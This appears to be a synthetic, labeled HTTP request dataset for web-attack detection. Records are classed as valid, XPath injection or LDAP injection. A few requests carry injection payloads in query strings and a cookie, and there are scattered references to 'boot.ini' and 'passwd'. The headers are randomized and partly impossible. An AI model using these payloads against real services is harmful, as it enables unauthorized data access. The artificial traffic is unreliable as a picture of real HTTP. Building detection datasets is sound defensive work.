ETag: "TuRdTw-hBPfWNyzx"
Expect: 100-continue
From: r0dm@twn4oe.uk
If-Modified-Since: Thu, 16 Feb 06 12:17:53 GMT
If-Unmodified-Since: Wed, 07 Dec 05 08:52:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4152
MIME-Version: 2.3
Pragma: tmoiEb='7uhtieew'
Proxy-Authorization: Digest opaque="Tany"
Authorization: Digest cnonce="w4n7b"
Range: 120-9
Referer: /auaflhnr.ace
TE: trailers,deflate,gzip;q=0.8
Trailer: Upgrade
User-Agent: 1gnas (sSiZXxe; dcG6_lGyj; t2v7wor; sAK7.uK0)
UA-CPU: MIPS
UA-Disp: 579,7280,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1738x3451
Via: 3.2 www.etoSttnS.shtml, HTTP/0.3 www.uk2ySs0.png, FTP/0.8 226.187.125.28
Transfer-Encoding: euat
Upgrade: tmu3/0.7
Warning: 229 172.134.147.231 "3eiaje2is" 
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23852
Start - Id: 18915
class: Valid
GET /rntos/e4DH34sarjuee4nAo7/9T5log3_9kconnectxp_pMW2/oJ36JM3b/bf87G4cYse2id-/mgtelnetF@accept/vlQmL/fnedehrdrlsntmtt/tSckWyR@int_8rDVA1.jpeg?dpr0rrr=50347345&qqOhjnnreaie=aoTsn3bsystemHlogn1c&tgBRJiypkB=iftvadminxsp&hiehe=5431702949&h9tpBeew3ofelk=cdpkymonrn%26&eu1ohCnnkeoy=at7sac3&jWOvZ0YlIaf=wrae HTTP/1.0
Host: 149.132.120.66
Connection: close
Accept: video/quicktime;q=0.5, image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: ktr4cei='ee5'
Client-ip: 166.177.25.206
Cookie: vIQeVL=izaldsss2c517tr;sPU6XOv0A5Ys=23791716
Cookie2: $Version="0"
Date: Thu, 25 Mar 10 10:23:12 CET
ETag: "HBxiEPbrzHOsoQpTJI"
Expect: 100-continue
From: yjsS@orU9r.uk
If-Modified-Since: Sat, 09 Dec 06 04:11:07 CET
If-Unmodified-Since: Fri, 16 Sep 05 20:49:54 GMT
If-Match: *
If-None-Match: "xP2Ogq1WPNqI2sd"
If-Range: Sat, 29 Oct 05 10:37:15 GMT
Max-Forwards: 52
MIME-Version: 2.2
Pragma: aifeueg='fnc'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZGNwQ2VlZWFhYWU5OXQ3dXJmbnVlZW9lblRwdGVyZW5oZ290U29kZTZmZXN1
Range: 3104-33,76-
Referer: /duaerd/7nhu2/che7bqno.swf
TE: trailers,chunked
Trailer: User-Agent
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 2.9; ek-g3; rv:6.6.9) Gecko/35726744
UA-CPU: Sparc
UA-Disp: 745,1444,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 905x897
Via: 6.4 www.keosy.jpeg, HTTP/2.9 80.225.249.241, FTP/6.6 www.kuetwXa.jpg
Transfer-Encoding: identity
Upgrade: eRaba/1.6, mmqn2/8.0, cwzoea/3.0
Warning: 540 37.121.159.48 "2sfimA" 
X-Forwarded-For: 197.169.87.183
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18915
Start - Id: 31785
class: Valid
GET /Aoaryrloiatyj/cmdDNJ8rdlw/ndupma8T4seikamTaie/1X/UHohtdocumentqgFzfO/cLEDreeY0RVNb6p5U_1/Rpu9cerx1isss43t/t6iYh7ZX.swf?srRpotid1fi=aeEtfo9lsr&tjonesod=arrldd7niyfexhpbUp&gr=87&lf74Sm.9=mwopegucexqQb&uwo=10897204&wH2.Q%ustyleS=215867&os5nsngSotamg3=tmpdjboot.ini&atl=858926076&pooxOsEwy=ybh&trfoalcasuRcoiu=ieit+aRn9mdA&eocixhaDazirtei=pEh%7C&Ismtaoo2iottoSe=ncga0GCNhsy&ns=657719468 HTTP/1.1
Host: 59.20.5.175
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, gzip;q=0.2, deflate, identity;q=0.9, compress;q=0.4
Accept-Language: Pq-1iatoy;q=0.2, h9-ihomsesf;q=0.2, alatlya9-r, i-eHostr;q=0.4, we-z8;q=0.6
Cache-Control: no-cache
Client-ip: 113.191.26.221
Cookie: atjirCrt=Oeteosearr;nm8UWxZaL=Aiiiqhxe;9XbesivsacLrh5=67820
Cookie2: $Version="6"
Date: Thu, 25 Jun 09 08:17:45 GMT
ETag: "wQiWX@C2374Hy9I"
Expect: 100-continue
From: o58tOaQr@asxayh.com
If-Modified-Since: Sat, 11 Apr 09 20:19:23 CET
If-Unmodified-Since: Mon, 10 Dec 07 23:26:15 CET
If-Match: *
If-None-Match: *
If-Range: "aAgqwxy17@lEZVrm_xu"
Max-Forwards: 5
MIME-Version: 5.5
Pragma: xa='dwnh'
Proxy-Authorization: Basic aHI4SGI6bmVpdHRy
Authorization: Basic dGRwR2xuczpOOUV6
Range: -15804,02-
Referer: /deo7ng/eti8gng/ps1or9/so8borcn.asmx
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/9.2 (X11; U; SunOS sun4u 4.0; rv-he; rv:5.4.3) Gecko/44410649
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7261x084
Via: cep/3.0 0.139.48.103:733, 7.4 www.vhDs.tiff:56434, FTP/9.1 www.nsd5sy.css:1
Transfer-Encoding: gzip
Upgrade: esydDt/5.2, eehi/1.6
Warning: 075 www.tgj5brs.htm "nOEloag30nqnokrne7lo" 
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31785
Start - Id: 35702
class: XPathInjection
GET /otEyaMe.gif?lprtm9fr=9970237&nftofotm43=%28i++++%3C++count%28eTe%2Fchild%3A%3Atext%28%29%29+and+++++j+++++%3C++++count%28tut%2Fchild%3A%3Acomment%28%29%29++++and+++k++++%3C+++++count%28e3ofss%2Fchild%3A%3A*%29+%29&nSIeHNG6=11&prcu2nyutt=priiolschaaya&u8uyVG9C2location=6tc%27&swu4pieanos=qO5ye4U&libMl6PechoKmU0=rK-JH3FBXsn&EeoEepTao8ttuaa=176305&er=ntB7%40ky2&yDfpassthrueGGrO=9892&mcZshqnjSn=reseh&8hooo=iJydhw1&kibf=li3tvdtooglt&5ymbKRlYN6z=08963868 HTTP/1.0
Host: 116.66.49.187
Connection: keep-alive
Accept: video/*;q=0.9, video/*;q=0.6
Accept-Charset: gb2312;q=0.9, iso-8859-1;q=0.4, iso-8859-9;q=0.5, windows-1252, windows-1257
Accept-Encoding: *;q=0.1
Accept-Language: tnrtv5x-iOrc4oj7, s3tgs0im-s;q=0.8
Cache-Control: max-age=347
Client-ip: 87.168.72.128
Cookie: dtgt=rhdtvsotrsnwt;unionMIQ4EA9fromVY=adceaggov=>aut;7nkhs1nz7p=' dEe[;brpts2no0aioqmm=irav5reocpbpjd
Cookie2: $Version="8"
Date: Wed, 30 Apr 08 15:59:19 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: aebhq
From: xcsXifnE@tneljth.ch
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Mon, 04 Apr 05 09:11:15 UTC
If-Match: "5CQDGMaj357PURfYP"
If-None-Match: "rlzk8rqxdGrIZMUJF"
If-Range: *
Max-Forwards: 5360
MIME-Version: 4.6
Pragma: n9=8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: http://rumudi.be/iine5bn/tefi.php3
TE: chunked,deflate;q=0.6,deflate
Trailer: Pragma
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 3.6; ns-el; rv:7.7.2) Gecko/87464381
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.3 30.118.18.157, lEnss/1.2 98.81.49.237:2964, FTP/3.3 www.S79ei.js
Transfer-Encoding: gzip
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35702
Start - Id: 16289
class: Valid
GET /ilpStcvtnod/zVco2/oI3nBWT/osd/jDbhzPoWRMp.WNN/vnFebR@Y0/oh/eIp/Z.U3jGoLRGBstyle.html?6erdrali8negv=88038&monevamnlhd=lhhlhel0totzrrc&ZMZd7MAM=0cuejkgtnc&ahiea=bpwinntcmvinode&sousepep5a=g_m7BE%402f&Dx=dEwbdl&Vr9nM3D=706&nz9siMpsracr5=70&anIttp=6928317&jatb23tahnce2=TDeOcopo&xtermS-B=02159051&eMse=hegkll1lmbodcegd&oc5ls3e77k=ckI HTTP/1.1
Host: 64.69.136.121:6943
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip
Accept-Language: 8nCpoT-n7;q=0.1, srpri-pmhlhuy, yd-d
Cache-Control: min-fresh=622
Client-ip: 134.144.136.159
Cookie: APIWTbnTimg0NY=seneeseze;eih1h=tt2;elcbatoeae2mtj=8507;4qzeyhnr=hiyTndttsirtyTi;ear=op2@km0U8S;ZArMbodyFVQ=5 ayf>t6c9r
Cookie2: $Version="7"
Date: Tue, 17 Apr 07 02:16:56 CET
ETag: "fqH_1kMUtbwPqMUmW2e"
Expect: ensheasc
From: 5Roldyt@fhtem.be
If-Modified-Since: Thu, 11 Mar 04 05:36:49 GMT
If-Unmodified-Since: Thu, 04 Aug 05 09:55:05 GMT
If-Match: "tUn6ypbOH.3@2Bd4WHSX"
If-None-Match: *
If-Range: Wed, 09 Feb 05 01:03:42 UTC
Max-Forwards: 5103
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic eXR1aDJyNDpvaXR0
Authorization: m3tska xmcxng=62Yt
Range: -4823,134863-6,-1714
Referer: /olxpfee/huTy/ILIopa/ttmlr/MtT7io.gz
TE: trailers,trailers
Trailer: Expect
User-Agent: reeitIt/0.4
UA-CPU: 68000
UA-Disp: 967,6730,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2196x3302
Via: 1.1 26.193.27.215, FTP/8.3 91.247.212.131, 1.3 www.eyih.jpeg:2
Transfer-Encoding: gzip
Upgrade: yejeyl/5.7, ooo/5.3
Warning: 052 186.95.53.70 "owyml9d5dtss6hanh" "Sun, 04 Sep 05 20:42:11 CET"
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 39357482225884778580
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16289
Start - Id: 20861
class: Valid
GET /3e8dcses/eats/ei6atvgewylegdae/krwacfzgnwuysg4e/pykmmshiz/tbktahsd/rzf8Tn2okgaan/eotootteSr.jpg? HTTP/1.0
Host: www.4esh9x.fr
Connection: rtbatA
Accept: video/quicktime;q=0.0, text/plain
Accept-Charset: ks_c_5601-1987;q=0.5
Accept-Encoding: 
Accept-Language: aezOisr-omt;q=0.6, ssre-nseiDIcu, Sesnu-oehtnOm
Cache-Control: no-cache
Client-ip: 186.115.77.25
Cookie: 1eulkf=hsAchc13riay>Qt;ohhM3cbrnijm=y1tssawinnt;nnQasE8rup9m=827501
Cookie2: $Version="34"
Date: Tue, 22 Jul 08 16:26:33 GMT
ETag: "BnbYQ5mwr2P6C.zMiP@"
Expect: 100-continue
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Fri, 16 Oct 09 05:55:33 CET
If-Unmodified-Since: Mon, 18 Dec 06 14:07:12 UTC
If-Match: *
If-None-Match: "bVmJmUvv4nHd.HrOZunm"
If-Range: *
Max-Forwards: 4729
MIME-Version: 8.4
Pragma: imdsned=o
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest response="EEfbCFf0BDfEeFa08e8c8c4e04Cdd3fd"
Range: 4992-
Referer: /tyuaae/tscsuhm.jpg
TE: gzip;q=0.3,chunked;q=0.8
Trailer: Referer
User-Agent: Mozilla/5.3 (compatible; MSIE 2.9; Mac OS X; nhhnSr; wsde)
UA-CPU: StrongARM
UA-Disp: 550,7756,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 691x8896
Via: 6.0 www.idOgrn.html
Transfer-Encoding: compress
Upgrade: 8If/0.9, 7ae/0.3
Warning: 296 214.47.11.12 "2nWtseAGip4" 
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 20861
Start - Id: 48468
class: XPathInjection
GET /isN0bdZZW87EfAO./ee49haaeimno/sUb0IAadPSizjq48aXR/gRCCQ6ko0IaVEBfhO/iZVh5c4VeGFCwA/ianrthhsthmdiaodid/ZY/nsTFmwjMutigUZ/hXq/aUwm3fqWBMTA_.P/niRehr.exe? HTTP/1.1
Host: 72.182.4.205:6
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.7
Accept-Language: oar6s2lw-ntiet;q=0.9
Cache-Control: 8fgiS='rmt'
Client-ip: 112.15.106.77
Cookie: j19Z=actmp) tnoaepki;tcE=s/et/ert/child::node()[     position()=07]  |     0c/lK2/lhswa/child::text()[position()=1]     or '5v'=';eEheat=ipnnO;IrK_=776
Cookie2: $Version="1"
Date: Sat, 09 Sep 06 05:42:12 UTC
ETag: "_ijH.YvbY2H80c-vv"
Expect: gsnen3
From: 7rate@sslaoieg.st
If-Modified-Since: Fri, 29 Jun 07 10:38:35 CET
If-Unmodified-Since: Wed, 14 Apr 10 20:27:39 UTC
If-Match: *
If-None-Match: "VjzXaQl-fBAoke7bj"
Max-Forwards: 1534
Pragma: sam=eosLl
Proxy-Authorization: 7vto beGCh6=td7mup
Range: -8,000319-4,-57
Referer: /drka.jpeg
TE: trailers
User-Agent: lozsea/2.6.6.6.8
UA-CPU: Sparc
UA-Disp: 4596,7427,16
Via: 9.1 20.81.162.216, 8.2 www.tenofe.shtml:6932
Transfer-Encoding: deflate
Upgrade: eetP9s/0.4, eTaecX/3.6, rezzo/3.0, pose9e/9.7
Warning: 216 www.neaatkhh.jpeg:6 "hacliae" 
X-Serial-Number: 60467521583413658
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48468
Start - Id: 2333
class: Valid
GET /7NBf_dC-A8V4WTp4IZGy.sh?ErNaAf=eslghonsl&M7gldropO=ort9telnetAhwedejnle&tpitle=Ta&cna4oIh=sMC&afg=e8iucglgous&ee1adehenvy6=o9ahrekow7gAia&rczltjaoeane=f27G.xrZBvk&t5ebior=+nt%3Bidasd%3Cmpassthrue&DPvx.optA.KD8log=s%3E4Sa&nQJy=6268&oyt0isxfpncio=40&o59etfeuzZ0bchn=TbyndzgETdd&meHmw=dP3EHfFM%40F&fqeesetne9emn=9353 HTTP/1.0
Host: 173.148.74.131
Connection: enc4aee
Accept: text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 47.81.49.136
Cookie: Tr5ton=yasl
Cookie2: $Version="0"
Date: Fri, 15 May 09 21:57:22 GMT
ETag: "GTT_ruE5smtFKc9n2li"
Expect: Setn
From: s4et@ks7hmvs0.net
If-Modified-Since: Sun, 30 Jan 05 07:55:40 CET
If-Unmodified-Since: Fri, 23 Jan 04 13:31:59 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Jun 09 24:03:37 UTC
Max-Forwards: 9
MIME-Version: 3.2
Pragma: eEr='30uyQg'
Proxy-Authorization: NTLM MmRvcnNyZnBlZWhtaG9yZWwyYWRkYmV3ZG5lZWEybjZyMzNreWJv
Authorization: Basic YXN0dGc6d3Blc2dlZQ==
Range: 744728-20044,-10
Referer: /vaifhsfn/ssnn9d/suyhbbow/buaaa/as99pima.js
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: asei8o/6.5
UA-CPU: Sparc
UA-Disp: 581,250,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1640x452
Via: 1.2 217.109.147.134
Transfer-Encoding: compress
Upgrade: nwio/9.0, n54lt8/8.5, iBdj/1.4, mosr/0.0, sgiit/9.8
Warning: 287 www.nmbeojUN.html "ecnaenetwacJolFrOica" "Tue, 01 Dec 09 09:09:42 UTC"
X-Forwarded-For: 120.175.57.26
X-Serial-Number: 7123081582615631
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2333
Start - Id: 21445
class: Valid
GET /roome3TlOualbaIas/saDMadmhKz2WsheO/dZPuBfV1pyZXiHKSo/u0winntRhaving/slinkWjeC/st3@3KabX@RMIn.html? HTTP/1.0
Host: www.oaoa.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: aaroee-etbOR;q=0.3
Cache-Control: max-age=3374
Client-ip: 91.48.79.53
Cookie: voloa=t09Z7gl4;uceereutidn7o=eKaXb-hYi;WVlvpGEdCwinnt=proq
Cookie2: $Version="256"
Date: Fri, 28 Mar 08 13:06:39 CET
ETag: "uFkHxAqv@i9U9aFaOFm"
Expect: 100-continue
From: e2q5@vn1vi8odsj.uk
If-Modified-Since: Thu, 01 Feb 07 07:56:55 CET
If-Unmodified-Since: Sun, 24 Oct 04 19:56:22 UTC
If-Match: "kjVtUPMrEWrBWLNB36"
If-None-Match: "SWqtoes@mBC-uAQh-w9"
If-Range: *
Max-Forwards: 47
MIME-Version: 2.5
Pragma: lsyot=shaq7bli
Proxy-Authorization: NTLM ZWFMaGVNZGp4cGRlbmFlQnRhaTNjZEllcnVyZWRoZXUydWFkc2xuZXl0Y25v
Authorization: nest eeciete=ewh3oo
Range: -5794,717335-,08-
Referer: /lzx9vf8c/wnrEp/ntb4eht7.nsf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 8.0; sk-iz; rv:3.4.8) Gecko/01179386
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2698x837
Via: 2.0 3.10.76.95
Transfer-Encoding: qlso
Upgrade: oiTi9i/7.3, ta8/0.8, sosmnS/8.4, at5n/2.0, pnrmtu/8.5
Warning: 868 www.psaerr.png "ieSephnp" 
X-Forwarded-For: 153.129.48.252
X-Serial-Number: 488226941016
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21445
Start - Id: 37729
class: LdapInjection
GET /NItelnetXaccess_logcC7/eAreuc_s2wtf/r3FdFs5aFSrxdCIBmEpQ.php?8rfzkojensjtti=055&NNDfromBKgH6=c0rsZ+d%2FevalconnectTE%29xe&Bc4ornynRh4o=%29%28+%7C++++%28++cn%3D*o+%27brien*++++%29%28mail+%3D*o%27brien*+%29++&ifOMso=434958903&edsltheDdenaho=46&neMnl38af=6&tbn=%40e&Dhhpeaor=esock_streamn%3D&h7hRnSgt=%2B+insertdnph-o%3DmaeTf+ao+n&rvmehiwvr1OE=%3Fg8neazboot.iniei%27am%3FhA+toselect&5Rrpasswdiframe=ts&lle3Uytemkhs=wrssarmyaogieI4dov&OzSetc=51067641&Dvwweasi6=n&PPvarxmochap=2%3Eeil+a1x%29%3Dxterm5p HTTP/1.1
Host: 99.242.42.199:51
Connection: keep-alive
Accept: text/html, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=33
Client-ip: 155.96.25.85
Cookie: rdszbIep7datgi=hyrayfM$z+eyadi;taoOhwBxnges5xW=78542129;rDlrihhobh=copyt&tNaa;divqiubin6y5m=aDigtum ejee/
Cookie2: $Version="0"
Date: Thu, 15 Mar 07 14:53:48 GMT
ETag: W/"qrG_OEUFRXt40hYLA0"
Expect: fniL
From: Iiydrs@AboeNOsxe.biz
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Mon, 24 Oct 05 02:00:30 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Jun 09 20:15:45 CET
Max-Forwards: 689
Pragma: no-cache
Authorization: NTLM N1hrbXBhbGEyZ2VhN1R0aW5lOTZub3ZjZWVuaXYwZWlsR2k=
Referer: /ob4ve/aaeo/esto1eta/yaiN.mdb
Trailer: From
User-Agent: rhwssa9ec2iIpeHFe
UA-CPU: x86
Via: ape/0.9 209.174.31.101
Transfer-Encoding: compress
Upgrade: tic/8.0, oHra/5.7, iee/5.7, onys/7.1
Warning: 812 www.dOsiefc.htm "lm4se" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37729
Start - Id: 8839
class: Valid
GET /ccPzw8.css? HTTP/1.1
Host: 156.91.153.126
Connection: eeisd
Accept: audio/x-wav;q=0.0, image/*;q=0.3
Accept-Charset: iso-8859-1, x-mac-chinesesimp;q=0.6, x-mac-turkish, euc-kr, x-mac-korean;q=0.1
Accept-Encoding: *
Accept-Language: ioi-aqzsuipe;q=0.6
Cache-Control: max-age=743
Client-ip: 34.60.153.94
Cookie: q8eylwfeIdr=29
Cookie2: $Version="336"
Date: Thu, 29 Jan 09 13:01:59 GMT
ETag: W/"UR3sW-PaYGURfJZ"
Expect: 100-continue
From: uq6Ima@5ccuIm.net
If-Modified-Since: Tue, 03 Mar 09 10:01:16 GMT
If-Unmodified-Since: Mon, 23 Mar 09 22:22:07 UTC
If-Match: "uNGB4fckn@8XliuG0p"
If-None-Match: "S65JCG-9SvA01JX9P"
If-Range: *
Max-Forwards: 88
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest qop=auth
Range: 01-5579,5729-
Referer: http://www.leOoms.biz/ilew/Remzr/eteaam/4Hwro.jpg
TE: trailers
Trailer: Max-Forwards
User-Agent: 2leiqsA1 (aQnsUnzw_d)
UA-CPU: x86
UA-Disp: 344,093,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 186x0429
Via: HTTP/0.2 246.114.60.134, 7.5 48.175.81.211
Transfer-Encoding: ht88
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 629 51.114.84.67 "oerorR" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 53766184065250016
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8839
Start - Id: 1715
class: Valid
GET /tdaeIaloi/smw5lmHecHPXe/fcopyMbgsoundZwC2bvyp/tvmwfXoptu7psxUdB/ok9ieMa_liix.php? HTTP/1.0
Host: 191.245.101.252
Connection: close
Accept: text/*;q=0.3, audio/*;q=0.9, video/*
Accept-Charset: utf-8, iso-8859-4;q=0.8, windows-1254;q=0.9, iso-8859-5;q=0.2, x-mac-chinesetrad
Accept-Encoding: *;q=0.2
Accept-Language: eedxx-rdienu
Cache-Control: only-if-cached
Client-ip: 114.67.189.247
Cookie: esfezneh6isnd=oo;tvie=y84-j9Z;niE5de54giie=616398;EblhiyaesOlar=112573608;neaiStq0eww=3xnfktTnXmohittw
Cookie2: $Version="689"
Date: Sat, 23 Oct 04 21:33:49 CET
ETag: "LqP66AJ3sj.doSbglm"
Expect: 100-continue
From: pa7hs@flEnsebniq.be
If-Modified-Since: Wed, 12 Aug 09 05:15:28 GMT
If-Unmodified-Since: Mon, 05 Sep 05 23:56:47 UTC
If-Match: "SOe.eZo5edygQk5nz"
If-None-Match: "JdD014aItoOJk2b"
If-Range: Fri, 30 Jul 04 19:53:54 GMT
Max-Forwards: 8687
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: hthuw Racet0om=tfr9
Range: 1231-888775
Referer: http://ewaiicv8.biz/gtheex3/Tiotee/caln/eotsywlr/t1nA.doc
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: 5c7tctze (nEMiPtWNob; iktrRW; oONcW6u; a24WAr5U)
UA-CPU: PowerPC
UA-Disp: 6638,4343,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 053x890
Via: HTTP/2.7 www.nfjrto.tiff:219
Transfer-Encoding: gzip
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 634106000415144
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1715
Start - Id: 16744
class: Valid
GET /I2jwnygnuei60h/tRxvHFuWoWpJ/RidelpmaetvL.png?dpldIsh=a0dg%3Fnet%5BAutifprocessing-instructionu&tSV57=9%3A%5BselectaixexeceoOchee+r+rz&rEYat1s=ue33TKP&Etolrct0ceetsoh=41219552&pPAHpH.C=0&MpEy=eurujstlaigve&5oaasm=ae%28j&SDq0=3619&nad=09&ldgt=hnaaye&pIeArle0otgOs7=+o%2Fjet&xdsipiti=ta4neifsewElt HTTP/1.1
Host: www.aou27.gov
Connection: close
Accept: video/quicktime, text/xml;q=0.5, video/quicktime;q=0.7
Accept-Charset: iso-8859-8;q=0.6
Accept-Encoding: gzip;q=0.0, gzip, compress;q=0.4, compress;q=0.7, deflate
Accept-Language: 4aa-oaemae;q=0.3
Cache-Control: max-age=2773
Client-ip: 245.122.179.87
Cookie: ecwTuASy=aeuedcrirzrRaib
Cookie2: $Version="256"
Date: Sat, 29 Sep 07 24:01:32 UTC
ETag: W/"K5u3WxTeMNkQ9xRSKa"
Expect: rApwuie=Hs3ndtih
From: qsiyd@ithlh90i.biz
If-Modified-Since: Mon, 25 Aug 08 09:26:05 CET
If-Unmodified-Since: Mon, 20 Sep 04 13:23:09 GMT
If-Match: "Af3drpco5L41Tbk5Ce6"
If-None-Match: "AWCD6yE@2mggPpbW_j"
If-Range: *
Max-Forwards: 029
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YnRyYklvcGFpcnNuZVNTbXMybXRhZWUxbzJ0ZnNlMG1odHJ3dzl1ZWVhTGNmZW54
Authorization: Basic aXplWUk6ZXRoUmU=
Range: 73855-,-7357
Referer: /imdsnl/r3etw.tar.gz
TE: trailers,trailers
Trailer: Trailer
User-Agent: mbGhrteah9ap
UA-CPU: PowerPC
UA-Disp: 9773,708,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 400x2875
Via: HTTP/4.3 143.175.182.225
Transfer-Encoding: compress
Upgrade: EsEsd/5.5, ttkmft/4.3
Warning: 082 www.cyawd.gif "ulhshseXosaHnh3a" "Wed, 29 Jun 05 18:19:58 CET"
X-Forwarded-For: 125.30.59.190
X-Serial-Number: 585140076554
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16744
Start - Id: 32724
class: Valid
POST /otaueyO/4AXehB3@gr/oRKKUBo47x/It4IegepeehEl/w5VczzyDbtb1R/C3xbinDWAtA0lhtaccesqp5/childTQvR@v.F5h6k/8aahm/beealfuup.jpg? HTTP/1.1
Content-Length: 248
Content-Language: na1r
Content-Encoding: deflate
Content-Location: /oyst.cfm
Content-MD5: aWVhTTdib2Fyc283aW9lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Jun 07 10:01:00 GMT
Last-Modified: Tue, 05 May 09 03:04:51 UTC
Host: 199.17.59.245:80
Connection: keep-alive
Accept: image/jpeg, text/xml, text/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, gzip, deflate;q=0.6
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 168.183.168.9
Cookie: 7ntdcAaj=2inputt;lLsdRaea7e=elDpwu hd;tAq2oscgeu3bcc=538480;Tr6ertienhr3yE=56946
Cookie2: $Version="02"
Date: Sat, 16 Sep 06 02:42:56 CET
ETag: "P4rYQxRGmRWfYPzbnT"
Expect: 100-continue
From: dnstcRli@is7ye.cz
If-Modified-Since: Tue, 03 Feb 04 08:20:52 GMT
If-Unmodified-Since: Mon, 31 Jul 06 15:56:21 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 983
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic dHNuY05vb2c6b2h4cm80
Authorization: Digest uri=http://www.eiiesntf.net/9genFto/dteE.php4
Range: 90783-,-4
Referer: /oent/8ooa/dEB6liha/tuCrla.txt
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 2.1; kD-cu; rv:1.1.1) Gecko/74531079
UA-CPU: PowerPC
UA-Disp: 9205,1280,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1032x4856
Via: HTTP/0.3 84.156.56.39
Transfer-Encoding: esgi
Upgrade: Ontms/2.9, ocVpad/2.0, t7o/2.5
Warning: 971 www.nreie.html:86955 "sootstDgebnbLaecv" 
X-Forwarded-For: 154.7.116.173
X-Serial-Number: 5962543728498976504
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

